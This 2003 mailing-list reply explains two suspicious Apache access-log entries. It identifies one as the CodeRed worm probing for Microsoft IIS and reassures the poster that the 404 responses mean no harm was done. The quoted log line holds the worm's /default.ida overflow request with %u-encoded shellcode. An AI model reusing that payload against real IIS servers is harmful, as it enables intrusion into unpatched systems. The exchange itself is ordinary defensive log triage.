On Sun May 04, 2003 at 04:2310PM +0200, Konstantin Filtschew wrote: > hi, > > found this in my /var/log/apache/access.log, what does that mean: > > 217.37.212.241 - - [04/May/2003:15:17:22 +0200] "GET > /default.ida?XXXXXXXXXXXXXX > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > XXXX > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > XXXX > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u > 9090 > %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b > 00%u > 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 277 "-" "-"
That's an old (approx 2 years) worm that attacks Microsoft IIS called CodeRed. Your server has the correct response (404, Not Found), so nothing to worry > 212.65.17.26 - - [04/May/2003:06:30:32 +0200] "GET > /.hash=680d6f5c4d584f6b5d941a > f136938db3751a840b HTTP/1.1" 404 324 "-" "-" No idea about that .. but its also Return Code 404, so probably nothing dangerous -- Michael Bergbauer <[EMAIL PROTECTED]> use your idle CPU cycles - See http://www.distributed.net for details. Visit our mud Geas at geas.franken.de Port 3333
